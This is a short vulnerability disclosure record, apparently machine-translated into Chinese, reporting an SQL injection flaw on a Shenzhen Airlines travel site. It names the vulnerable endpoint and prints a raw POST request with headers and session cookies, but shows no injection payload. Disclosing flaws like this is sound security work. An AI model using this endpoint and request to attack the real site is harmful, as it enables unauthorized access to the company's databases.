漏洞标题 深航某处SQL注入漏洞（涉及10个库） 相关制造商 深圳航空 漏洞作者 过路人 提交时间 2016-05-01 08: 08 公共时间 2016-06-17 09: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 11 漏洞状态 制造商已确认 标签标签 漏洞详细信息 http://www.airpp.com/frontTicketHelpAction!aboutus.action http://sys.airpp.com 彭鹏旅游网有SQL注入漏洞： POST /pptravel/membermanage/proFrontManageAction!findProByParam.action HTTP/1.1 内容长度: 81 内容类型: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer:http://sys.airpp.com/ Cookie: JSESSIONID=E2737DF255042B15594A3F75B1CB9682.tomcat1; JSESSIONID=E2737DF255042B15594A3F75B1CB9682.tomcat1; Hm_lvt_4060872cc09bf10b0082de626e535d51=1461809370,1461809527,1461809606,1461809870; Hm_lpvt_4060872cc09bf10b0082de626e535d51=1461809870; Clients_IPAddress=％u9655％u897F％u7701％2C％u897F％u5B89％u5E02; HMACCOUNT=15388A95F027CE2A; ASPSESSIONIDSQRBSRRA=NJEGFGIANMPJMIBLKPDLGLLD; ASPSESSIONIDCCDBCSTT=KMGGFGIABAANDOCEALCBBMJJ; __qc_wId=434; pgv_pvid=8689421847 主机: sys.airpp.com 连接:保持活动状态 Accept-Encoding: gzip，deflate 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.21（KHTML，与Gecko一样）Chrome/41.0.2228.0 Safari/537.21 从对等方接收数据时失败